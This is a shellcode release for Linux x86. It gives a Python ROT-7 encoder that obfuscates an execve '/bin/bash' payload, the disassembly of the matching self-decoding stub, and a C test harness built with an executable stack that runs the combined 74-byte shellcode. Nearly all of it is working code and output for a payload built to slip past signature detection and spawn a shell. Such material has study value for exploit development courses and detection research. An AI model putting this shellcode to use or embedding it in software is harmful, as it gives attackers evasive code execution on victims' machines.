/*
|
|
|
|
ROT-7 Decoder Shellcode - Linux Intel/x86
|
|
Author: Stavros Metzidakis
|
|
|
|
*/
|
|
|
|
|
|
a) Python ROT-7 encoder for shellcode (execve-stack)
|
|
---------------------------------------------------------------------------------------
|
|
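#!/usr/bin/python

# Python ROT-7 Encoder
#
# Rotates every byte of `shellcode` forward by ROT (mod 256) so the raw
# execve-stack payload does not appear verbatim in the final binary; the
# decoder stub in part (b) subtracts the same amount again at run time.
# Written to run unchanged under Python 2 and Python 3.

# Amount to rotate by.  Must match the `0x7` immediates used by the decoder
# stub (`sub BYTE PTR [esi],0x7` / `mov bl,0x7`).
ROT = 7

# execve-stack shellcode ("////bin/bash"), 30 bytes.
shellcode = (b"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")


def rot_encode(data, rot=ROT):
    """Return a bytearray with each byte of `data` rotated forward by `rot`.

    `data` is any bytes-like object.  (x + rot) & 0xff gives exactly the value
    the old "x > 255-ROT" special case produced, without the branch.
    """
    return bytearray((x + rot) & 0xff for x in bytearray(data))


def as_c_string(data):
    """Format bytes as the body of a C "\\xNN..." string literal."""
    return ''.join('\\x%02x' % x for x in bytearray(data))


def as_c_array(data):
    """Format bytes as a "0xNN," initialiser list (trailing comma kept)."""
    return ''.join('0x%02x,' % x for x in bytearray(data))


rotated = rot_encode(shellcode)
encoded = as_c_string(rotated)
encoded2 = as_c_array(rotated)

print('Encoded shellcode ...')
print(encoded)
print(encoded2)
print('Len: %d' % len(rotated))

# The C harness below measures the payload with strlen() and the decoder stub
# is glued to it as a C string, so an encoded 0x00 byte (any input byte equal
# to 256 - ROT) would silently truncate the payload.  Say so instead.
if 0 in rotated:
    print('WARNING: encoded shellcode contains a NUL byte; strlen() will truncate it')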
|
|
---------------------------------------------------------------------------------------
|
|
Test run:
|
|
$ ./rot-7-encoder.py
|
|
Encoded shellcode ...
|
|
\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87
|
|
0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87,
|
|
Len: 30
|
|
|
|
|
|
|
|
|
|
b) Decoder for a ROT-7 encoded shellcode (execve-stack)
|
|
---------------------------------------------------------------------------------------
|
|
$objdump -d rot-7-decoder -M intel
|
|
|
|
rot-7-decoder: file format elf32-i386
|
|
|
|
|
|
Disassembly of section .text:
|
|
|
|
08048060 <_start>:
|
|
8048060: eb 25 jmp 8048087 <call_decoder>
|
|
|
|
08048062 <decoder>:
|
|
8048062: 5e pop esi
|
|
8048063: 31 c9 xor ecx,ecx
|
|
8048065:	b1 1e                	mov    cl,0x1e		;ROTed shellcode length goes here (0x1e = 30, must equal the encoder's "Len:" output; it is a single byte, so a payload over 255 bytes needs a wider, NUL-free load into ecx)
|
|
|
|
08048067 <decode>:
|
|
8048067: 80 3e 07 cmp BYTE PTR [esi],0x7
|
|
804806a:	7c 05                	jl     8048071 <lowbound>	;signed compare: also taken for every byte >= 0x80. Harmless, because <lowbound> computes ([esi]-7) mod 256 as well; an 8-bit `sub` already wraps modulo 256, so the whole cmp/jl/<lowbound> path could be dropped to shrink the stub.
|
|
804806c: 80 2e 07 sub BYTE PTR [esi],0x7
|
|
804806f: eb 11 jmp 8048082 <common_commands>
|
|
|
|
08048071 <lowbound>:
|
|
8048071: 31 db xor ebx,ebx
|
|
8048073: 31 d2 xor edx,edx
|
|
8048075: b3 07 mov bl,0x7
|
|
8048077: b2 ff mov dl,0xff
|
|
8048079: 66 42 inc dx
|
|
804807b: 2a 1e sub bl,BYTE PTR [esi]
|
|
804807d: 66 29 da sub dx,bx
|
|
8048080: 88 16 mov BYTE PTR [esi],dl
|
|
|
|
08048082 <common_commands>:
|
|
8048082: 46 inc esi
|
|
8048083: e2 e2 loop 8048067 <decode>
|
|
8048085: eb 05 jmp 804808c <Shellcode>
|
|
|
|
08048087 <call_decoder>:
|
|
8048087: e8 d6 ff ff ff call 8048062 <decoder>
|
|
|
|
0804808c <Shellcode>:		;ROTed shellcode (decoded in place by <decoder>, so this region must be writable as well as executable)
|
|
804808c: 38 c7 cmp bh,al
|
|
804808e: 57 push edi
|
|
804808f: 6f outs dx,DWORD PTR ds:[esi]
|
|
8048090: 69 68 7a 6f 6f 69 70 imul ebp,DWORD PTR [eax+0x7a],0x70696f6f
|
|
8048097: 75 36 jne 80480cf <Shellcode+0x43>
|
|
8048099: 6f outs dx,DWORD PTR ds:[esi]
|
|
804809a: 36 ss
|
|
804809b: 36 ss
|
|
804809c: 36 ss
|
|
804809d: 36 ss
|
|
804809e: 90 nop
|
|
804809f: ea 57 90 e9 5a 90 e8 jmp 0xe890:0x5ae99057
|
|
80480a6: b7 12 mov bh,0x12
|
|
80480a8: d4 87 aam 0x87
|
|
---------------------------------------------------------------------------------------
|
|
|
|
|
|
$ cat shellcode.c
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
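/* 44-byte ROT-7 decoder stub (\xeb\x25 ... \xff) immediately followed by the
 * 30-byte rotated execve-stack payload emitted by the Python encoder above.
 * The stub subtracts 7 from every payload byte in place before jumping into
 * it, so the buffer has to be writable and executable at run time (hence the
 * `-z execstack` build line). */
unsigned char code[] = "\xeb\x25\x5e\x31\xc9\xb1\x1e\x80\x3e\x07\x7c\x05\x80\x2e\x07\xeb\x11\x31\xdb\x31\xd2\xb3\x07\xb2\xff\x66\x42\x2a\x1e\x66\x29\xda\x88\x16\x46\xe2\xe2\xeb\x05\xe8\xd6\xff\xff\xff\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87";

/*
 * Test harness: prints the payload length and jumps straight into `code`.
 *
 * `code` is a C string, so any 0x00 byte in the stub or the rotated payload
 * would stop strlen() early; that case is detected and refused below rather
 * than executing a truncated buffer.  This program runs arbitrary machine
 * code from its own image -- build and run it only inside a disposable VM.
 */
int main(void)
{
	size_t len = strlen((const char *)code);

	/* strlen() returns size_t; %d with it is undefined behaviour. */
	printf("Shellcode Length: %zu\n", len);

	/* sizeof includes the terminating NUL, so a mismatch means an embedded NUL. */
	if (len != sizeof(code) - 1) {
		fprintf(stderr, "NUL byte inside shellcode at offset %zu; refusing to run\n", len);
		return 1;
	}

	/* Jump into the buffer; a successful execve() never returns. */
	void (*ret)(void) = (void (*)(void))code;
	ret();

	return 0;
}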
|
|
|
|
|
|
$ gcc ./shellcode.c -fno-stack-protector -z execstack -o shellcode
|
|
$ ./shellcode
|
|
Shellcode Length: 74
|
|
$ |